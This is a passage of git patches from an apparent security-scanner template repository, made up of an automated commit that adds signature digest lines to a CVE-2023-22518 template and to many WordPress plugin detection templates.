http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -7517,7 +7517,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:edf11f4b4b360c348b6659c852dd9bd1e36fd121 +templates-checksum.txt:46ec6c5c3b480cbb1050ef960171df4c5d7e6ecd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cfa86b737b71e09769229409b16c10fc0d5dd098 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 06:16:04 +0000 Subject: [PATCH 09/36] Auto Template Signing [Fri Nov 3 06:16:04 UTC 2023] :robot: --- http/cves/2023/CVE-2023-22518.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index a87c099d40..cd596eff90 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -54,4 +54,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 4b0a00483046022100db845fade39b9ca175a9d14b955c502455c685b2a42fe3e87ee36df72d9ebfeb022100a0e2045354799014789f4de9555b5f4ad9411b9b79a80bd0e77012e5e51bf955:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022074611cf8360af402eab4224903570e50569a0a115df2b5cbe092341e10b75748022100ea16e1b28f542368626bb141260ba18a0359147d652f99f0b26b4e89c79bf7dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..181c6e7915 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3efc21ea695725f961317c9d53002869458f326d1711eaf08c8943c6f601958022100a2b98df78365ee9c1304cdf9251aaf8e30438012da34e9e59978a39abd462d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..d233a1c412 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205bde16a6bd3ff49eeed2d5d475fe54f7f4c64e4fe8a37b8fdf402ea002c76a01022041f20d5f9475f23ea18cc48e8046aa157cc2982d1fc851929ec1a60646c3d191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..fc3b8ac52a 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203d18edc1144e023fe603286f8250fc523db42e3a4fde2a78306f8ac38394ffda022100915f74bb0e6d5ba650cc7281d2eef03dac41bf6e96eb327aebb22915b931a4ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..570d379d5d 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206066900474bbb8fa4e998b239b3b2c76ff3a8e6f2f5bb33046e4699713214d3c022100ac1430ccb88e6dbf67b494efa14c10f706ee8dcee8b7a2ad691b2346ca6332ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..64dd52582a 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220681c726c6b1d043e9e9542e8f308b2a3760c39d3dfc23be758e208359c5a7d30022100847fe531f7b3248420a1d85ab28528ab205c46b4661b4173c3754b1c838465a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..95338b13b3 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022062c3554f538b50918a7e244b549b7149963bab171dc975ebf04db333b282a4de022061959bdfb1c7bc412d5901e379496114ffcf3461e72c024ea9f1c47bd3dcc662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..23244102fa 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008b9bcac660f69109d4b82075976ae13a6496a9c827221ade578a6a69dada1d4c02203e8e35b138bf7d4febaa69c52508984af7171d8920f08d74b6018e435f3f2540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..e8665b7fac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022100c75145c169fdd73772803f9eb9298f2b2809882fe64453b2a804a840143f1641021f2c7e62343070f1af71bc48416de1bbb8724a2c7891ba70093d692b48f69d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..afbb6a2b2d 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eea326e299375de4fc3e8a067089132c4804bcbd20bd29614f26d4c009271a8802200afe66da298913bd556c968a6ab07ec7d01629d0d7bf812c6fa25ee2ddbf9faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..3a6e8f7942 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220283532808a416990d541ec89be6fbfbeca5d4625d140e1a03bec5e45c10d468d02202833959ab2d2fcaf4dd40c101c407d272e4e1a1a680cbfe8291631fe1c55a673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a073f22452 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b0d5fd2fcf14f8a51f378b9b3a82bb09cc46bc8e6a8e31e7f6b75ef1769750202207eabc9af91c138fc37ab046ce5f854ff0ad5c272af1d71a183e71d6e8422cdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..34196b442d 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d80126653c9ea98957c7e200f5dc444071b2807e0851a1fa9a40589ba26a7cd022017b0f868c67730a1364c34df22e6a7dae4b25c93e78e679e104d84f8448e48bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..2412345646 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d190fb029f8b7c7af44c531d3ce2db3d591cb2ac1122d465d1b24a706100336022100a3876fdce6912a7461299b67ee7d40ec865aa5fa2c3c85de578892d1306b4199:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..a7878ce1e5 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220772c07f84fc63f1c9739bac79f98b8a59285a3ac1eb93b7bc7164b1516f3c691022030cdbe9bfbc7b4d08eb42f93442a64f2d82a09c35c8942675b90c05701f69d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..e535a243b8 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d076c2ef4b2f70c59d25bced773cb76873e05ead35aa7d1e680886308dff987e02204abf4be4b552298e29697788dcdb11231a38c56887aaefe8489d400a60b87b0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..56bb6e0e77 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035636c788d6618089ef6ab2637a7a0f281b6ca9c11ddc17853f7cf2f783840b90221009509605eb2882e7a329808a6c817ec35398da0b39c21010f34db6ac5776055c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index d1e01c329b..f48f337ec9 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202105ebd370e924c550e236d1d8bf7b0aabe5806a941d22bfe2e78a840e247a11022100c81922261d2d63e9a29c072da3687c8af801f7adb406013beb408f8b8ebe3c51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..a025e34f32 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202bbaf10d61684bf4d13b7f2b7da7fcbbec6d412cd89198009354169e65c99ba102205d5f3d5e4b13e7264c92f6fdcf111f207e5aa5b11807bbd88c3245acc2211aee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..33eb0ad880 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022041468c6328755035440be35c524baf8c88ee35798f4bfa5db3eefc16903fb113022061cd95b759f11062f376d8238367c339504a3b1e3ab5a055d4002ee5b5421dfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..f4d1477392 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009bc9075ea0d8480810cd61917b7aa7dc9c18d280a6b71ca9850cbcc7bfb4d6e702203f6c5bdfe8bcadbc84761dad65e0b8c1a05fdeb27c229381dfe1123fdf5d47cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..ed785466f6 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d1251f5b7d6556cc909ee66b939b1c7b33ac1419366031a935b56ee6650cee102204c9bf80fb49ac8d2759010028ac5b999c61193a3e064271bb11ab0584762ec9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..873dee82a8 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220623f6c10b67a593245ec74ef6af8ec04187e3c3f5f1e461054764ce92fcdd00d022029834a82390df5e2740b3db0ba98c25685a66a56c1e82d09c035e4ddff4d885b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..4afea468d3 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203da0d1030d67f46a79614b7ccdaa9d43b8cdf254f2964622bbb1df4b911a550c022100d5439a6c3f2eac13b23eca375ca650d5052f47125af6ff6ab3c7d57d21a6a0a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..95dc9d8699 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a300954552ab0adc8f54a358a00b8a4ee1ca781300b4f2ba67c04228f6151bf02205a3ba9bc507795d6656b51e0cbed84913e245fcac01b6a23739abaaa6fe0578e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..897d031ecc 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ 